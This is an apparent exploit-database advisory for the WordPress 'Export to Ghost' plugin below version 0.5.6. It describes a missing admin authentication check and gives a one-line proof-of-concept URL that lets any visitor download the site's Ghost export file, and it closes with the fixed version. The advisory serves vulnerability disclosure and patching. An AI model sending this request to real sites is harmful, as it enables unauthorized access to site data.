23 lines
No EOL
663 B
Text
23 lines
No EOL
663 B
Text
# Exploit Title: WordPress Export to Ghost Unrestricted Export Download
|
|
# Date: 28-04-2016
|
|
# Software Link: https://wordpress.org/plugins/ghost
|
|
# Exploit Author: Josh Brody
|
|
# Contact: http://twitter.com/joshmn
|
|
# Website: http://josh.mn/
|
|
# Category: webapps
|
|
|
|
1. Description
|
|
|
|
Any visitor can download the Ghost Export file because of a failure to check if an admin user is properly authenticated. Assume all versions < 0.5.6 are vulnerable.
|
|
|
|
2. Proof of Concept
|
|
|
|
http://example.com/wp-admin/tools.php?ghostexport=true&submit=Download+Ghost+file
|
|
|
|
File will be downloaded.
|
|
|
|
3. Solution:
|
|
|
|
Update to version 0.5.6
|
|
|
|
https://downloads.wordpress.org/plugin/ghost.0.5.6.zip |